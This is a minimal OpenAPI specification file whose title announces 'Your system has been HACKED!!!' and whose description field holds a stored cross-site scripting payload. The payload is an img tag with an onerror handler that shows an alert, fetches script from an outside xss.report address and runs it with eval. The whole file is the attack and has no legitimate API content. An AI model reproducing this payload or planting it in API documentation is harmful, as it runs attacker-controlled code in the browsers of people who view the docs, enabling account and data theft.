openapi: 3.0.0
info:
  title: Your system has been HACKED!!!
  description: <img onerror=alert("Pak Tiko was here!!!");fetch("https://xss.report/c/santiko86").then(function(res){res.text().then(function(data){eval(data)})})>
  version: 0.1.9

